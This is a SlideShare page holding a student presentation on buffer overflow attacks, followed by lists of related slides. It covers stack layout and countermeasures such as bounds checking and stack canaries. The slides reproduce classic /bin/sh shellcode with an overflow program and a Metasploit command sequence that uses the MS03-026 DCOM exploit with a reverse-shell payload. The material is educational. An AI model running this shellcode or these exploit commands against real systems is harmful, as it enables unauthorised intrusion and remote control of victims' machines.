SlideShare una empresa de Scribd logo

Buffer overflow attacks

Descargar como PPTX, PDF
Kapil Nagrale
Kapil Nagrale

Presentation on buffer overflow attack

Educación
1 de 18
BUFFER OVERFLOW ATTACKS Submitted By : Kapil Nagrale M.tech FY Software Engineering Roll No : 132190015
OUTLINE        INTRODUCTION STACK BASIS HOW IT WORKS ? IMPLEMENTING WITH METASPLOIT COUNTERMEASURES CONCLUSION REFERENCES
INTRODUCTION  What is buffer overflow? More data is put into a holding area than it can handle. Cause: Lack of bound checking (eg: standard C library )  An Intrusion or a Successful Attack aims to change the flow of control ( using buffer overflow), letting the attacker execute arbitrary code
INTRODUCTION  Morris worm (November 1988) Used finger Daemon to overflow buffer  Code Red worm (July 2001)  Slammer Worm (Jan 2003) Exploits the vulnerability in Microsoft SQL Server 2000
STACK BASICS Lower Memory Addresses Local Variables Old Base Pointer Return Address Higher Memory Address Arguments
HOW IT WORKS? void main() { int x; x = 0; function(1,2,3); x = 1; void function( int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; printf( "%dn",x); } ret = buffer1 + 12; (*ret) += 8; } This function jumps over the x=1 assignment directly to the printf() and prints the value as 0. The offsets (12, 8 used above ) are machine-dependant.
CONTINUED What do you do after overflowing the buffer?  Inject some code into the victim. Make the function return to this code  Spawning a shell  void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); }  Dump the executable of the above execve() command and store it in a buffer
char shellcode[] = "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" "x80xe8xdcxffxffxff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; // Fill the large_string Array with the address of the buffer // (shell code) for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; // Copy shell code to the beginning of large_string for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; // Copy large_string onto buffer. This overflows the return address // and execs a shell strcpy(buffer,large_string); }
In a real security attack, malicious code usually comes form  environment variable  user input  network connection List of unsafe functions in the standard C library  strcpy()  strcat()  getwd()  gets()  fscanf()  scanf()  sprintf()
IMPLEMENTING WITH METASPLOIT  What is Metasploit? The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing .
TERMINOLOGIES  Exploit : Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access).  Payload : A payload is the program or code that is delivered to the victim system.  Session : Connection from successful exploit  LHOST : LOCAL HOST  RHOST : REMOTE HOST
IMPLEMENTATION          msf > use exploit/windows/dcerpc/ms03_026_dcom msf > show options msf > set RHOST 10.0.0.3 msf >show payloads msf >set PAYLOAD generic/shell_reverse_tcp msf >set LHOST 10.0.0.6 msf > exploit sessions –i 1 It will give a comman shell of victim’s computer on msfconsole. If the vulnerable program has root privileges one can have complete access to system.
COUNTERMEASURES  Array Bounds Checking While injecting code is optional for a buffer overflow attack, the corruption of control flow is essential. Thus unlike non-executable buffers, array bounds checking completely stops buffer overflow vulnerabilities and attacks. If arrays cannot be overflowed at all, then array overflows cannot be used to corrupt adjacent program state.
STACK GUARD METHOD DETECTING RETURN ADDRESS CHANGE: CANARY Place a Canary word before the return Address When the function returns, it first checks to see that the “CANARY WORD” is intact before jumping to the address pointed to by the return address
STACK SHIELD  Global Ret Stack Whenever a function call is made, the return address being pushed onto the normal stack is at the same time copied into the Global Ret Stack array. The Global Ret Stack has by default 256 entries, which limits the nesting depth to 256 function calls  RET Range Check It uses a global variable to store the return address of the current function.  Protecting Function Pointers Add checking code before all function calls that make use of function pointers to make sure that the function pointer does not point to parts of memory other than text segment.
CONCLUSION  The best available tool is effective against only 50% of the attacks. Often these tools incur undesirable performance overheads.  Even if we start writing the best of code from this point of time, there is still millions of code lines of “Legacy Code” out there which is vulnerable.  StackGuard is a systematic compiler tool that prevents a broad class of buffer overflow security attacks from succeeding.
REFERENCES  Conference on Software Security : Aleph One, Smashing the Stack for Fun and Profit. Originally published in Phrack 4914.1996  IEEE Reference : Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade*  The 7th International Conference on Computer Science & Education (ICCSE 2012)The Principle and Prevention of Windows Buffer Overflow  Pincus, Jonathan,”Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns”, IEEE Security&Privacy
Q&A

Recomendados

Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
Evgeni Tsonev
 
Buffer Overflow Attacks
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attacks
harshal kshatriya
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
قصي نسور
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
Joe McCarthy
 
Exception handling
Exception handlingException handling
Exception handling
Tata Consultancy Services
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Anoop T
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
n|u - The Open Security Community
 
Mod security
Mod securityMod security
Mod security
Shruthi Kamath
 

Recomendados

Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
Evgeni Tsonev
 
Buffer Overflow Attacks
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attacks
harshal kshatriya
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
قصي نسور
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
Joe McCarthy
 
Exception handling
Exception handlingException handling
Exception handling
Tata Consultancy Services
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Anoop T
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
n|u - The Open Security Community
 
Mod security
Mod securityMod security
Mod security
Shruthi Kamath
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
n|u - The Open Security Community
 
Sql injection
Sql injectionSql injection
Sql injection
Nitish Kumar
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
Prateek Chauhan
 
SQL injection
SQL injectionSQL injection
SQL injection
Raj Parmar
 
Presentation on-exception-handling
Presentation on-exception-handlingPresentation on-exception-handling
Presentation on-exception-handling
Nahian Ahmed
 
Windows Hacking
Windows HackingWindows Hacking
Windows Hacking
Mayur Sutariya
 
Chapter 2 program-security
Chapter 2 program-securityChapter 2 program-security
Chapter 2 program-security
Vamsee Krishna Kiran
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
Scott Hurrey
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
n|u - The Open Security Community
 
Buffer overflow explained
Buffer overflow explainedBuffer overflow explained
Buffer overflow explained
Teja Babu
 
Rmi presentation
Rmi presentationRmi presentation
Rmi presentation
Azad public school
 
Xss attack
Xss attackXss attack
Xss attack
Manjushree Mashal
 
Java IO
Java IOJava IO
Java IO
UTSAB NEUPANE
 
Function overloading(c++)
Function overloading(c++)Function overloading(c++)
Function overloading(c++)
Ritika Sharma
 
Exception Handling
Exception HandlingException Handling
Exception Handling
Reddhi Basu
 
Program Threats
Program ThreatsProgram Threats
Program Threats
guestab0ee0
 
Java I/o streams
Java I/o streamsJava I/o streams
Java I/o streams
Hamid Ghorbani
 
Exception Handling in object oriented programming using C++
Exception Handling in object oriented programming using C++Exception Handling in object oriented programming using C++
Exception Handling in object oriented programming using C++
Janki Shah
 
Dc 12 Chiueh
Dc 12 ChiuehDc 12 Chiueh
Dc 12 Chiueh
wollard
 
20100309 03 - Vulnerability analysis (McCabe)
20100309 03 - Vulnerability analysis (McCabe)20100309 03 - Vulnerability analysis (McCabe)
20100309 03 - Vulnerability analysis (McCabe)
LeClubQualiteLogicielle
 

Más contenido relacionado

La actualidad más candente

La actualidad más candente (20)

Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
 
Sql injection
Sql injectionSql injection
Sql injection
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
 
SQL injection
SQL injectionSQL injection
SQL injection
 
Presentation on-exception-handling
Presentation on-exception-handlingPresentation on-exception-handling
Presentation on-exception-handling
 
Windows Hacking
Windows HackingWindows Hacking
Windows Hacking
 
Chapter 2 program-security
Chapter 2 program-securityChapter 2 program-security
Chapter 2 program-security
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
 
Buffer overflow explained
Buffer overflow explainedBuffer overflow explained
Buffer overflow explained
 
Rmi presentation
Rmi presentationRmi presentation
Rmi presentation
 
Xss attack
Xss attackXss attack
Xss attack
 
Java IO
Java IOJava IO
Java IO
 
Function overloading(c++)
Function overloading(c++)Function overloading(c++)
Function overloading(c++)
 
Exception Handling
Exception HandlingException Handling
Exception Handling
 
Program Threats
Program ThreatsProgram Threats
Program Threats
 
Java I/o streams
Java I/o streamsJava I/o streams
Java I/o streams
 
Exception Handling in object oriented programming using C++
Exception Handling in object oriented programming using C++Exception Handling in object oriented programming using C++
Exception Handling in object oriented programming using C++
 

Similar a Buffer overflow attacks

Dc 12 Chiueh
Dc 12 ChiuehDc 12 Chiueh
Dc 12 Chiueh
wollard
 
Debugging With Id
Debugging With IdDebugging With Id
Debugging With Id
guest215c4e
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
webhostingguy
 
1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx 1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx
aryan532920
 
DefCon 2012 - Rooting SOHO Routers
DefCon 2012 - Rooting SOHO RoutersDefCon 2012 - Rooting SOHO Routers
DefCon 2012 - Rooting SOHO Routers
Michael Smith
 
Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?
Javier Tallón
 
Report on hacking blind
Report on hacking blindReport on hacking blind
Report on hacking blind
NikitaAndhale
 

Similar a Buffer overflow attacks (20)

Dc 12 Chiueh
Dc 12 ChiuehDc 12 Chiueh
Dc 12 Chiueh
 
20100309 03 - Vulnerability analysis (McCabe)
20100309 03 - Vulnerability analysis (McCabe)20100309 03 - Vulnerability analysis (McCabe)
20100309 03 - Vulnerability analysis (McCabe)
 
Return oriented programming (ROP)
Return oriented programming (ROP)Return oriented programming (ROP)
Return oriented programming (ROP)
 
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1 Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
 
Debugging With Id
Debugging With IdDebugging With Id
Debugging With Id
 
Finding Diversity In Remote Code Injection Exploits
Finding Diversity In Remote Code Injection ExploitsFinding Diversity In Remote Code Injection Exploits
Finding Diversity In Remote Code Injection Exploits
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx 1Buttercup On Network-based Detection of Polymorphic B.docx
1Buttercup On Network-based Detection of Polymorphic B.docx
 
Reverse shell
Reverse shellReverse shell
Reverse shell
 
Static Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without FightingStatic Analysis: The Art of Fighting without Fighting
Static Analysis: The Art of Fighting without Fighting
 
Software Security
Software SecuritySoftware Security
Software Security
 
DefCon 2012 - Rooting SOHO Routers
DefCon 2012 - Rooting SOHO RoutersDefCon 2012 - Rooting SOHO Routers
DefCon 2012 - Rooting SOHO Routers
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730
 
Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
Advanced malwareanalysis training session2 botnet analysis part1
Advanced malwareanalysis training session2 botnet analysis part1Advanced malwareanalysis training session2 botnet analysis part1
Advanced malwareanalysis training session2 botnet analysis part1
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflow
 
Report on hacking blind
Report on hacking blindReport on hacking blind
Report on hacking blind
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 

Último

Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
ZurliaSoop
 

Último (20)

HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
 
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
 
NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...
NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...
NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...
 
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptxHMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
 
How to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POSHow to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POS
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptx
 
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptxOn_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
 
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
 
COMMUNICATING NEGATIVE NEWS - APPROACHES .pptx
COMMUNICATING NEGATIVE NEWS - APPROACHES .pptxCOMMUNICATING NEGATIVE NEWS - APPROACHES .pptx
COMMUNICATING NEGATIVE NEWS - APPROACHES .pptx
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
 
Graduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - EnglishGraduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - English
 
How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
Interdisciplinary_Insights_Data_Collection_Methods.pptx
Interdisciplinary_Insights_Data_Collection_Methods.pptxInterdisciplinary_Insights_Data_Collection_Methods.pptx
Interdisciplinary_Insights_Data_Collection_Methods.pptx
 
How to Add New Custom Addons Path in Odoo 17
How to Add New Custom Addons Path in Odoo 17How to Add New Custom Addons Path in Odoo 17
How to Add New Custom Addons Path in Odoo 17
 
SOC 101 Demonstration of Learning Presentation
SOC 101 Demonstration of Learning PresentationSOC 101 Demonstration of Learning Presentation
SOC 101 Demonstration of Learning Presentation
 
Understanding Accommodations and Modifications
Understanding Accommodations and ModificationsUnderstanding Accommodations and Modifications
Understanding Accommodations and Modifications
 
Jamworks pilot and AI at Jisc (20/03/2024)
Jamworks pilot and AI at Jisc (20/03/2024)Jamworks pilot and AI at Jisc (20/03/2024)
Jamworks pilot and AI at Jisc (20/03/2024)
 
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
 
This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.
 

Buffer overflow attacks

  • 1. BUFFER OVERFLOW ATTACKS Submitted By : Kapil Nagrale M.tech FY Software Engineering Roll No : 132190015
  • 2. OUTLINE        INTRODUCTION STACK BASIS HOW IT WORKS ? IMPLEMENTING WITH METASPLOIT COUNTERMEASURES CONCLUSION REFERENCES
  • 3. INTRODUCTION  What is buffer overflow? More data is put into a holding area than it can handle. Cause: Lack of bound checking (eg: standard C library )  An Intrusion or a Successful Attack aims to change the flow of control ( using buffer overflow), letting the attacker execute arbitrary code
  • 4. INTRODUCTION  Morris worm (November 1988) Used finger Daemon to overflow buffer  Code Red worm (July 2001)  Slammer Worm (Jan 2003) Exploits the vulnerability in Microsoft SQL Server 2000
  • 5. STACK BASICS Lower Memory Addresses Local Variables Old Base Pointer Return Address Higher Memory Address Arguments
  • 6. HOW IT WORKS? void main() { int x; x = 0; function(1,2,3); x = 1; void function( int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; printf( "%dn",x); } ret = buffer1 + 12; (*ret) += 8; } This function jumps over the x=1 assignment directly to the printf() and prints the value as 0. The offsets (12, 8 used above ) are machine-dependant.
  • 7. CONTINUED What do you do after overflowing the buffer?  Inject some code into the victim. Make the function return to this code  Spawning a shell  void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); }  Dump the executable of the above execve() command and store it in a buffer
  • 8. char shellcode[] = "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" "x80xe8xdcxffxffxff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; // Fill the large_string Array with the address of the buffer // (shell code) for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; // Copy shell code to the beginning of large_string for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; // Copy large_string onto buffer. This overflows the return address // and execs a shell strcpy(buffer,large_string); }
  • 9. In a real security attack, malicious code usually comes form  environment variable  user input  network connection List of unsafe functions in the standard C library  strcpy()  strcat()  getwd()  gets()  fscanf()  scanf()  sprintf()
  • 10. IMPLEMENTING WITH METASPLOIT  What is Metasploit? The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing .
  • 11. TERMINOLOGIES  Exploit : Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access).  Payload : A payload is the program or code that is delivered to the victim system.  Session : Connection from successful exploit  LHOST : LOCAL HOST  RHOST : REMOTE HOST
  • 12. IMPLEMENTATION          msf > use exploit/windows/dcerpc/ms03_026_dcom msf > show options msf > set RHOST 10.0.0.3 msf >show payloads msf >set PAYLOAD generic/shell_reverse_tcp msf >set LHOST 10.0.0.6 msf > exploit sessions –i 1 It will give a comman shell of victim’s computer on msfconsole. If the vulnerable program has root privileges one can have complete access to system.
  • 13. COUNTERMEASURES  Array Bounds Checking While injecting code is optional for a buffer overflow attack, the corruption of control flow is essential. Thus unlike non-executable buffers, array bounds checking completely stops buffer overflow vulnerabilities and attacks. If arrays cannot be overflowed at all, then array overflows cannot be used to corrupt adjacent program state.
  • 14. STACK GUARD METHOD DETECTING RETURN ADDRESS CHANGE: CANARY Place a Canary word before the return Address When the function returns, it first checks to see that the “CANARY WORD” is intact before jumping to the address pointed to by the return address
  • 15. STACK SHIELD  Global Ret Stack Whenever a function call is made, the return address being pushed onto the normal stack is at the same time copied into the Global Ret Stack array. The Global Ret Stack has by default 256 entries, which limits the nesting depth to 256 function calls  RET Range Check It uses a global variable to store the return address of the current function.  Protecting Function Pointers Add checking code before all function calls that make use of function pointers to make sure that the function pointer does not point to parts of memory other than text segment.
  • 16. CONCLUSION  The best available tool is effective against only 50% of the attacks. Often these tools incur undesirable performance overheads.  Even if we start writing the best of code from this point of time, there is still millions of code lines of “Legacy Code” out there which is vulnerable.  StackGuard is a systematic compiler tool that prevents a broad class of buffer overflow security attacks from succeeding.
  • 17. REFERENCES  Conference on Software Security : Aleph One, Smashing the Stack for Fun and Profit. Originally published in Phrack 4914.1996  IEEE Reference : Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade*  The 7th International Conference on Computer Science & Education (ICCSE 2012)The Principle and Prevention of Windows Buffer Overflow  Pincus, Jonathan,”Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns”, IEEE Security&Privacy
  • 18. Q&A